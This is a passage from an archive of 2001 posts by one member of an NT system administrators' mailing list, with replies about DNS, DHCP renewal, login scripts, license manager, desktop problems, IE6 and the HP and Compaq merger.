know as far as the future. Any thoughts or strategies, experiences with
this document?

DJ



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Unable to resolve DNS

2001-09-05 Thread RZorz
Title: RE: Unable to resolve DNS





Guys/Gals - he's not getting these - he asked for a direct post to his account. 


-Original Message-
From: Jeff Wilcox [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 05, 2001 7:47 AM
To: NT System Admin Issues
Subject: RE: Unable to resolve DNS



There are a couple things to check:


When you do a nslookup, does your your dns server try to resolve the
address?
Do you have a reverse lookup zone created?
Is your DNS server set to forward an requests to your ISP dns server?


-Original Message-
From: Neil Macdonald [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 05, 2001 10:48 AM
To: NT System Admin Issues
Subject: Unable to resolve DNS



Hello, all.


My NT server has suddenly stopped resolving DNS names. It's NT 4, sp 6a,
connected to a router and an ADSL line to our providers site, where there
are two DNS servers. I can ping out using IP addresses, but if I ping a
www site I get bad IP address. I have reinstalled TCP/IP and service
packed to no avail. I also removed RAS and an old external modem which
wasn't being used (Tapisrv.exe was using some resources, and technet
implied this may be a cause). All other PC's on the network can browse
internet, without problem, so it's definitely the server. It was working
on minute, then the next... nothing. I have updated antivirus and scanned,
nothing there.


Please help !


Incidentally, I am not receiving the mails from the list, so please reply
to [EMAIL PROTECTED] with ideas and I will be most grateful.


Thank you one and all,


Neil Macdonald


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



**
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the e-mail originator.


This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses. However, 
please check this e-mail for virus infection for which
CDG Management LLC accepts no responsibility
**



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Force DHCP clients to update

2001-09-04 Thread RZorz
Title: Message



http://support.microsoft.com/support/kb/articles/Q197/4/24.ASPfor a VB example - 
looks like it clears the ip address.

http://support.microsoft.com/support/kb/articles/Q217/0/35.ASPfor 
a reghack to set win98 to automatically release dhcp info on 
shutdown.

Either could be helpful. Guess it depends on the 
number of workstations if it's worth it. 

  -Original Message-From: Brian Judge 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 9:27 
  AMTo: NT System Admin IssuesSubject: RE: Force DHCP 
  clients to update
  According to m$, this can't be done. When a scope changes, clients will 
  only automatically renew the lease after half the lease time has expired. 
  Winipcfg has to be used for win95 clients (I think ipconfig /renew_all) will 
  work for win98.
  

-Original Message-From: Anthony 
[mailto:[EMAIL PROTECTED]] Sent: 04 September 
2001 16:56To: NT System Admin IssuesSubject: Re: Force 
DHCP clients to update
Hmmm,
Anyhow, as with NT4 dhcp scopes, can you not 
just set the lease to 1 day or something?
Then after a week, set it back to whatever you 
had set it to before?

  - Original Message - 
  From: 
  Martin Blackstone 
  To: NT System Admin 
  Issues 
  Sent: Tuesday, September 04, 2001 
  3:51 PM
  Subject: RE: Force DHCP clients to 
  update
  
  When I did this, I sent all my users an email with a simple .cmd 
  file.
  
  @Echo Off
  IPConfig /Release
  IPConfig /renew
  exit
  

-Original Message-From: Brian 
Judge [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 
2001 7:30 AMTo: NT System Admin IssuesSubject: 
Force DHCP clients to update
Hi all. I've just changed a setting on my 
DHCP server (Win2k). I added in a gateway. Does anyone know of a way to 
force all all clients to renew their lease, thus obtaining the updated 
information. I have a mixture of Win9x and Win2k clients. I was thinking 
of adding in an "ipconfig /release, ipconfig /renew etc." line into a 
login script but some win9x clients won't accept this.
Any thoughts greatly appreciated. 

Brian Judge 
The information in this e-mail (which 
includes any files transmitted with it) is confidential and may also be 
legally privileged. It is intended for the addressee only. Access to 
this email by anyone else is unauthorised. It is not to be relied upon 
by any other person other than the addressee except with our prior 
approval. If no such approval is given, we will not accept liability (in 
negligence or otherwise) rising from any third party acting, or 
refraining from acting, on such information. Unauthorised recipients are 
required to maintain confidentiality. 
If you have received this e-mail in error 
please notify us immediately, destroy any copies and delete it from your 
computer system. Any use, dissemination, forwarding, printing or copying 
of the email is prohibited. Copyright in this e-mail and any document 
created by us will be and remain vested in us and will not be 
transferred to you. We assert the right to be identified as the author 
of and to object to any misuses of the contents of this email or such 
documents. 
Grant Thornton is authorised by the Institute 
of Chartered Accountants in Ireland to carry on investment business. A 
list of partners may be inspected at Grant Thornton, Ashford House, Tara 
Street, Dublin 2, 
Irelandhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  The information in this e-mail (which includes any 
  files transmitted with it) is confidential and may also be legally privileged. 
  It is intended for the addressee only. Access to this email by anyone else is 
  unauthorised. It is not to be relied upon by any other person other than the 
  addressee except with our prior approval. If no such approval is given, we 
  will not accept liability (in negligence or otherwise) rising from any third 
  party acting, or refraining from acting, on such information. Unauthorised 
  recipients are required to maintain confidentiality. 
  If you have received this e-mail in error please 
  notify us immediately, destroy any copies and delete it from your computer 
  system. Any use, dissemination, forwarding, printing or copying of the email 
  is prohibited. Copyright in this e-mail and any document created by us will be 
  and remain vested in us and will not be transferred to you. We assert the 
  right to be identified as the author 

RE: HP to Acquire Compaq in $25B Deal

2001-09-04 Thread RZorz
Title: Message



Yup. 
Doesn't matter if it's merger, purchase or hostile takeover - heads will 
roll. Been there, done that. The only people that make out 
like bandits are the stationary people (letterhead, business 
cards,etc.)

Hopefullythe layoffs won't negatively affect service(it will 
of course, 'cause the bright sparks will see 30 HP techs and 30 Compaq techs and 
reason somehow that 35 techs can handle the combined load), and the 15k lives + 
family members negatively affected willfind gainful employment. 


  -Original Message-From: xylog 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 10:44 
  AMTo: NT System Admin IssuesSubject: RE: HP to Acquire 
  Compaq in $25B Deal
  
  I have been through 
  several mergers of large/Fortune 100 corperations (Union Bank of 
  Switzerland and Swiss Bank/Paine 
  Webber and Kitter Peabody) and can speak from experience when I say that ther 
  will be large cuts in the workforce of both companies to eliminate redundant 
  functions. It is just common sense to cut costs by combining, wherever 
  possible, duplicated functions. Where these cuts will occur is a matter of 
  speculation, but you can be sure since HP has controlling interests they will 
  generally get preferential treatment.
  
  xylog
  
  -Original 
  Message-From: David 
  James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 
  2001 1:25 
  PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B 
  Deal
  
  
  It's not 
  a merger?
  
  You'd 
  better learn big business. It's a merger, and don't expect to see too 
  many changes too quickly. Compaq was already making big time changes in 
  it's product line before this even happened. HP was planning on getting 
  out of the PC business anyways. A name change could happen, but who 
  knows? 
  
  I don't 
  appreciate the naive comment anyhoo...
  
  You 
  saying it's not a merger is naive...
  
  
  -Original 
  Message-From: xylog 
  [mailto:[EMAIL PROTECTED]] Sent: 
  Tuesday, September 
  04, 2001 12:03 
  PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B 
  Deal
  Except 
  its not a merger. HP purchsed compaq. HP's management now controls the 
  Compaq's destiny. What this means is that HP will, in order to cut costs, 
  eliminate all possible redundant functions.I agree it is a good merger, but it 
  is very naïve to expect nothing to change. 
  
  xylog
  
  -Original 
  Message-From: David 
  James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 
  2001 12:48 
  PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B 
  Deal
  
  
  I don't 
  think there will be duplicate positions. I expect them to continue to 
  function as 2 seperate companies. Compaq's name is much bigger than HP, 
  especially in the server market. I think HP just wanted a bigger piece 
  of the PC and Server pie, and Compaq wanted the financial backing of HP's 
  dominance in the peripheral and printer market. It's a good 
  merger.
  -Original 
  Message-From: Jim 
  Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 
  2001 11:32 
  AMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B 
  Deal
  
  Interesting 
  articles at www.infoworld.com:
  1. 
  HP, Compaq target enterprise, services 
  markets in $25 billion acquisition 
  2. 
  Merger highlights role of HP's 
  Fiorina
  
  While the merger 
  may not guarantee an improvement in sales/performance, does anyone see a 
  downside to the merger (other than HP/Compaq employees who will lose their job 
  when duplicate positions are eliminated)?
  
  
  
  Do you expect the 
  merger to provide better products and 
  services?
  
  Best Regards, JMU 
  
  

  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: HP to Acquire Compaq in $25B Deal

2001-09-04 Thread RZorz
Title: Message



h, 
oooh, I know. He finds them on the internet, which he invented along with 
pants. 

  -Original Message-From: Bill Higgins 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 
  11:38 AMTo: NT System Admin IssuesSubject: RE: HP to 
  Acquire Compaq in $25B Deal
  William (1) 
  
  Where do you find these things?
  
  (1) 
  Hi William
  
-Original Message-From: Lefkovics, William 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 
2001 11:32To: NT System Admin IssuesSubject: RE: HP to 
Acquire Compaq in $25B Deal
I 
hear the new HP Proliants will ship with WindowsRG:
http://www.newgrounds.com/portal/uploads/27000/27549_winrg2.swf

William

-Original Message-From: C.E. GENE CONNOR 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 
11:41 AMTo: NT System Admin IssuesSubject: RE: HP to 
Acquire Compaq in $25B Deal
The combined entity, which will take the Hewlett-Packard name
http://www.zdnet.com/zdnn/stories/news/0,4586,5096522,00.html?chkpt=zdnnt090401ts

Gene C. aka C.E. Gene ConnorGene's Custom PC Service 
since 1989Serving the U.S., Canada  London,England

  -Original Message-From: Andrew Baker 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 
  1:45 PMTo: NT System Admin IssuesSubject: RE: HP to 
  Acquire Compaq in $25B Deal
  Agreed.
  
  
  - 
  ASB
  
  
-Original Message-From: xylog 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 1:44 
PMTo: NT System Admin IssuesSubject: RE: HP to 
Acquire Compaq in $25B Deal

I have been 
through several mergers of large/Fortune 100 corperations (Union Bank of 
Switzerland and Swiss 
Bank/Paine Webber and Kitter Peabody) and can speak from experience when 
I say that ther will be large cuts in the workforce of both companies to 
eliminate redundant functions. It is just common sense to cut costs by 
combining, wherever possible, duplicated functions. Where these cuts 
will occur is a matter of speculation, but you can be sure since HP has 
controlling interests they will generally get preferential 
treatment.

xylog
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: nt40 desktop not appearing

2001-08-31 Thread RZorz
Title: RE: nt40 desktop not appearing





Is explorer running in taskmanager? if not, try adding it.


-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Friday, August 31, 2001 9:19 AM
To: NT System Admin Issues
Subject: nt40 desktop not appearing





After I rebooted my NT4.0 SP4 development server today it returned only the
the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background.
I logged in but only received a blank blue screen, no icons or desktop. No
task bar etc.


I can even hit CTRL-ALT-DEL and get the task manager dialog and that all
works, but I cannot get access to the desktop.


Anyone have any idea what the heck is going on? There is no virus, not
connected to Internet or no programs have been installed.


Thanks,


John Cesta



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Internet Explorer 6.0

2001-08-31 Thread RZorz
Title: Message



Got 
this from Lockergnome Tech Specialist:
IE6 and McAfee 
No less than four readers wrote in to complain about Internet 
Explorer 6 and McAfee virus scanning software. While I don't consider this a 
Microsoft problem, some might. Norton AV seems to work just fine on one of my 
systems, but I can't personally speak for McAfee. Tread lightly around the 
issue, as their support has told two of those that wrote in very bluntly that 
they should simply reinstall IE 5.5x. That's a complete cop-out in my book. 
There was plenty of lead-time on IE6 for McAfee to get their act together, so I 
don't think there's any excuse for not having an update available. Just wanted 
to warn you. 


  From: Martin 
  Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 
  2001 15:49 
  To: NT System Admin 
  Issues 
  Subject: RE: Internet Explorer 
  6.0 
  
  
  
  Hmmm...No We have done a test rollout 
  here to about 6 WKs. Nobody has reported any issues 
  yet. 
  
  -Original 
  Message- 
  From: Murray Freeman [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, August 30, 2001 1:39 
  PM 
  To: NT System Admin 
  Issues 
  Subject: Internet Explorer 
  6.0 
  
  
  Well, a couple of us have 
  installed IE 6.0 and we seem to be having frame problems. Pages display ads, but 
  not the text just like when we print them sometimes. And on some, we 
  get the text, but no sidebars. Any ideas? 
  Murray 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Internet Explorer 6.0

2001-08-31 Thread RZorz
Title: Message



I 
dunno. You've got the whole snip from his newsletter. 

  -Original Message-From: Allen Crawford 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, August 31, 2001 9:26 
  AMTo: NT System Admin IssuesSubject: RE: Internet 
  Explorer 6.0
  
  What 
  exactly is the problem with McAfee and 
IE6?
  
  -Original 
  Message-From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Friday, August 31, 2001 11:19 
  AMTo: NT System Admin 
  IssuesSubject: RE: Internet 
  Explorer 6.0
  
  Got this from 
  Lockergnome Tech Specialist:
  IE6 
  and McAfee 
  No less than four 
  readers wrote in to complain about Internet Explorer 6 and McAfee virus 
  scanning software. While I don't consider this a Microsoft problem, some 
  might. Norton AV seems to work just fine on one of my systems, but I can't 
  personally speak for McAfee. Tread lightly around the issue, as their support 
  has told two of those that wrote in very bluntly that they should simply 
  reinstall IE 5.5x. That's a complete cop-out in my book. There was plenty of 
  lead-time on IE6 for McAfee to get their act together, so I don't think 
  there's any excuse for not having an update available. Just wanted to warn 
  you. 
  From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 
  2001 15:49 
  To: NT System Admin 
  Issues 
  Subject: RE: Internet Explorer 
  6.0 
  
  
  Hmmm...No We have done a test rollout 
  here to about 6 WKs. Nobody has reported any issues 
  yet. 
  
  -Original 
  Message- 
  From: Murray Freeman [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, August 30, 2001 1:39 
  PM 
  To: NT System Admin 
  Issues 
  Subject: Internet Explorer 
  6.0 
  
  
  Well, a couple 
  of us have installed IE 6.0 and we seem to be having frame problems. Pages 
  display ads, but not the text just like when we print them sometimes. And 
  on some, we get the text, but no sidebars. Any ideas? 
  Murray 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: windows 2000 login script entry

2001-08-30 Thread RZorz
Title: RE: windows 2000 login script entry





usermanager allows you to select everyone via the control key I think.


-Original Message-
From: Paul Green [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 30, 2001 1:31 PM
To: NT System Admin Issues
Subject: windows 2000 login script entry



Anyone know how to do a batch edit of all users? I need to change
everyone's login script to login.bat. I have about 150 users to change.


I'm using Windows 2000 Server with AD. 
Thanks,
Paul 


 _ 


Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (www.grisoft.com). 
Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: windows 2000 login script entry

2001-08-30 Thread RZorz
Title: RE: windows 2000 login script entry



Now 
that I look at the subject again, I realize that my answer (albeit not as 
detailed as yours) works for NT. Guess it's the same for w2k 
too?

  -Original Message-From: xylog 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 30, 2001 2:28 
  PMTo: NT System Admin IssuesSubject: Re: windows 2000 
  login script entry
  More to the point after selecting mulitple users 
  via control and shift keys User Manager allows you to alter certain properties 
  for all selected users and one of these properties happens to be the logon 
  script setting.
  
  xylog
  
- Original Message - 
From: 
[EMAIL PROTECTED] 

To: NT System Admin 
Issues 
Sent: Thursday, August 30, 2001 4:49 
PM
Subject: RE: windows 2000 login script 
entry

usermanager allows you to select everyone via the control 
key I think. 
-Original Message- From: 
Paul Green [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 
2000 login script entry 
Anyone know how to do a batch edit of all users? I need to 
change everyone's login script to login.bat. I have 
about 150 users to change. 
I'm using Windows 2000 Server with AD. Thanks, Paul 
 _ 
Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 
8/23/2001 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: License manager

2001-08-29 Thread RZorz
Title: Message



Don't 
sweat it. How do you think we learned? 

  -Original Message-From: Mal Sasalu 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 9:36 
  AMTo: NT System Admin IssuesSubject: RE: License 
  manager
  ok 
  ok ok guys. Thanks. Dumbs like me still exists, who prefer Rum or Whisky over 
  Beer. Thanks everyone for your input.
  
-Original Message-From: Martin Blackstone 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 
29, 2001 10:16 AMTo: NT System Admin IssuesSubject: 
RE: License manager
How Martin installs NT:

1) 
Install W2K instead

2) 
Disable License Logging Service
3) 
Apply latest sp.
4) Eat fish tacos and drink 
beer

  
  -Original Message-From: Lefkovics, 
  William [mailto:[EMAIL PROTECTED]] Sent: Wednesday, 
  August 29, 2001 9:03 AMTo: NT System Admin 
  IssuesSubject: RE: License manager
  How William installs NT:
  
  1) Install NT
  2) Disable License Logging Service
  3) Apply latest sp.
  
  :o)
  
  -Original Message-From: Mal Sasalu 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 
  8:29 AMTo: NT System Admin IssuesSubject: FW: 
  License manager
  
  
Hi All

I am sorry if this turns out to be a long question. I have joined 
new in this company. We have some wiered problems with 
licensing.The domain controller (which is also our 
exchange)license manager shows like this

product 
per seat 
purchased 
per seat alocated per server 
purchased 
per server reached

Microsoft exchange 
5.5 
0 
0 
0 
0

Microsoft exchange 
5.5 
0 
0 
0 
0

Microsoft exchange 
5.5 
0 
0 
0 
0

Microsoft exchange 
5.5 
0313 
0 
126
Microsoft SQL 
Server 
0 
565 
220 
574

I am failing to 
interpret this. We have around 130 people working here. 


Thanks
Mal



http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: OT E-Mail Disclaimers

2001-08-29 Thread RZorz
Title: Message



About 
as silly, andtherefore has probably been used, as the hacker argument that 
says "well, their system doesn't say "No unauthorized personnel", it says 
"Welcome". 

  -Original Message-From: Sean Martin 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 
  2001 9:39 AMTo: NT System Admin IssuesSubject: RE: OT 
  E-Mail Disclaimers
  I 
  agree with the majority on this one. Disclaimers are pretty 
  obnoxious.Yet I was asked to implement one.However, I don't think 
  the reason for most organizations using disclaimers it to completely cover 
  their a$$ in a legal situation. I would imagine it's just one more thing an 
  organization can do to help. There are so many loopholes out there that 
  everyone has to be sure to cover all bases. If one didn't have a disclaimer, a 
  defending attorney would probably use that fact in their argument..."My client 
  was unaware that the plans for the next neutron bomb were confidential and not 
  to be forwarded to friends and family overseas."
  
  Just 
  my .02
  
  Regards,
  
  Sean Martin, 
  MCSENetwork AdministratorRibelin Lowell  
  CompanyInsurance Brokers, Inc.3111 C Street, Suite 300Anchorage, 
  Alaska 99503Ph: (907) 561-1250Fax: (907) 561-4315Cell: (907) 
  229-0885Email: [EMAIL PROTECTED]
  
-Original Message-From: Blake R. Fowkes 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 8:16 
AMTo: NT System Admin IssuesSubject: RE: OT E-Mail 
Disclaimers
We 
have everyone put the following disclaimer on anything that is not 
personal. It is what our legal department came up 
with.


CONFIDENTIALITY 
NOTICE
The information contained in 
this electronic mail is strictly confidential, attorney work product; or 
subject to the Attorney-Client Privilege. This transmission is 
intended only for the addressee(s) named. You are hereby notified that any 
use, disclosure, dissemination, distribution, copying, or taking of any 
action because of this information by any party other than 
the addressee(s), is strictly 
prohibited. If you have received this transmission in error, please 
notify the sender by email, or call (512) 255- 
immediately.

Thanks, Blake Fowkes Waid and Associates 



  -Original Message-From: Banyas, Pat F. Civ 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 
  2001 11:21 AMTo: NT System Admin IssuesSubject: RE: 
  OT E-Mail Disclaimers
  Thanks to all 
  who replied. We are reviewing this topic since users are allowed to 
  send and receive personal mail as well as Official mail due to our remote 
  location. While it may have no legal standpoint at this time, it 
  does make the point to those who receive it that the disclaimer is drawing 
  their attention to something they should be aware of. I realize no 
  one likes them, I was just looking for some examples since I have seen 
  quite a few at the bottom of emails sent to this list. 
  Thanks
  
  Pat 
  Banyas
  
  -Original Message-From: Waters, Jeff 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 
  2001 11:08 AMTo: NT System Admin IssuesSubject: RE: 
  OT E-Mail Disclaimers
  They are just plain evil, I would highly recommend 
  going over to the Exchange list and asking the question. Just put on 
  your flame suit first.
  Jeff
  
  
-Original Message-From: Erik Sojka 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 
11:03 AMTo: NT System Admin IssuesSubject: RE: OT 
E-Mail Disclaimers
We should discuss this on the Swynk Exchange list (ls.swynk.com) 
They love discussing email disclaimers and do it quite 
often.

  
  -Original Message-From: Correa, 
  Andre [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 
  29, 2001 11:03 AMTo: NT System Admin 
  IssuesSubject: RE: OT E-Mail 
  Disclaimers
  
  Do 
  they serve some legal purpose? 
  
  
  -Original 
  Message-From: 
  Kelly Borndale [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 
  10:45 AMTo: NT 
  System Admin IssuesSubject: Re: OT E-Mail 
  Disclaimers
  
  They are annoying, and they mean 
  little to nothing.
  K.Borndale
  
  [EMAIL PROTECTED] -home 
  email
  
  - 
  Original Message - 
  
  From: Banyas, Pat F. Civ 
  
  
  To: NT System Admin 
  Issues 
  Sent: Wednesday, 
  August 29, 2001 10:33 AM
  Subject: OT E-Mail 
  Disclaimers
  
  

RE: Desktop icons not responding

2001-08-29 Thread RZorz



how 
about just rebooting? 

  -Original Message-From: Steve More 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 12:38 
  PMTo: NT System Admin IssuesSubject: RE: Desktop icons 
  not responding
  Check to see if Explorer.exe is running, if not 
  someone is playing with you.
  
-Original Message-From: Myung Bang 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 
12:36 PMTo: NT System Admin IssuesSubject: Re: Desktop 
icons not respondingWell, I can not delete any icons on 
the desktop. Delete key doesn't work. I brought up the Display Properties 
and only odd thing I can see is, Background Pattern is empty and Edit 
Pattern button is gray out. All other seems ok. Maybe this Background 
Pattern has something to do with my problem. 
"Rogers, Jeff L (OM)" wrote: 

  
  that's why I suggested checking to see what the desktop properties 
  were, what background, wallpaper, etc. 
  
-Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, August 29, 
2001 14:13 To: 
NT System Admin Issues Subject: RE: Desktop icons not responding 


Sounds like you have been 
tricked. Did someone pasted a desk top screen shot on your machine??. 
Try click and hit 
delete.

Mal 
-Original 
Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, August 29, 
2001 1:07 PM To: NT System Admin Issues 
Subject: Re: Desktop icons not 
responding 

Event log doesn't tell me anything. No error 
messages. Mouse does not function on the desktop at all, so, right mouse 
click on the desktop doesn't do anything. But if I open any application, 
it will work within those 
applications 
Sean Martin 
wrote: 
Sounds like a problem I was 
having with our Exchange server awhile back due to low virtual memory. 
What does the event log tell you? Our problem was related to 
GroupShield, so I uninstalled it and replaced with Antigen 
:o)Regards,Sean 
Martin, MCSE 
Network 
Administrator 
Ribelin Lowell  
Company 
Insurance Brokers, 
Inc. 
3111 C Street, Suite 
300 
Anchorage, Alaska 
99503 
Ph: (907) 
561-1250 
Fax: (907) 
561-4315 
Cell: (907) 
229-0885 
Email: [EMAIL PROTECTED] 
-Original 
Message- 
From: Rogers, 
Jeff L (OM) [mailto:[EMAIL PROTECTED]] Sent: 
Wednesday, August 29, 2001 10:36 AM To: NT 
System Admin Issues Subject: RE: 
Desktop icons not responding 
Interesting. Just for grins: what 
happens when you right-click the "desktop?" What is the wallpaper 
or background right now? 
-Original 
Message- 
From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 13:31 To: NT System Admin Issues Subject: Desktop icons not responding 
Hello, I am having an interesting problem on 
NT 4.0 SP6a machine. I can not click icons on the desktop using the mouse. I can tap trough 
using keyboard and access them, but mouse click doesn't work. I can, 
however, 
use mouse clicks on Start menus. Mouse click 
just would not work on 
desktop icons. Also, it won't work on newly 
created icons, neither. 
Anyone seen this behavior 
before?? 
Thanks. Myung 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
-- ** 
Email: [EMAIL PROTECTED] Phone: (757) 269-7158 
Fax: (757) 269-7053 Pager: (757) 888-7561 
**  
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Domain Admin cannot use admin tools

2001-08-28 Thread RZorz
Title: RE: Domain Admin cannot use admin tools





Have you rebooted yet? 


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, August 28, 2001 6:57 AM
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Thanks agin.


No, system error 5 (access denied) is returned. 
I'm stumped!


 [EMAIL PROTECTED] 08/28/01 09:41AM 
Can you add a dummy user from the command line using NET USER command? 




-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, 28 August 2001 14:40
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Thanks for the reply.
No, we have a single domain, no trusts. Netlogon is running fine. Nothing in
the event logs pertinent to the problem.


 [EMAIL PROTECTED] 08/28/01 09:19AM 
trusts? have your account permissions been revoked in the trusted domain?
contact those administrators and verify membership? i get the message but i
am no longer an account op in the trusted domain...


===
Lerone Streeter
System Analyst
Abbott LBG
[EMAIL PROTECTED] 
===


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, August 28, 2001 8:55 AM
To: NT System Admin Issues
Subject: Domain Admin cannot use admin tools



Strange thing started happening last week. All the domain administrators
have lost the capability of using usrmgr.exe and srvmgr.exe! They come up,
but any attempt to make changes gets ACCESS DENIED. 


All accounts are still domain admins, and all rights remain unchanged.
Checked for viruses and resynched, but no change. We are running Novell
Account manager in parallel, but nothing has changed with it either,
although I am most suspicious of this as the cause, but I need to cover all
the bases.


Has anyone seen this before?


Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201


(803) 898-5522



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Domain Admin cannot use admin tools

2001-08-28 Thread RZorz
Title: RE: Domain Admin cannot use admin tools





Frustrated screenwriter? Nice to know some things never change - when in doubt - reboot. 


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]]
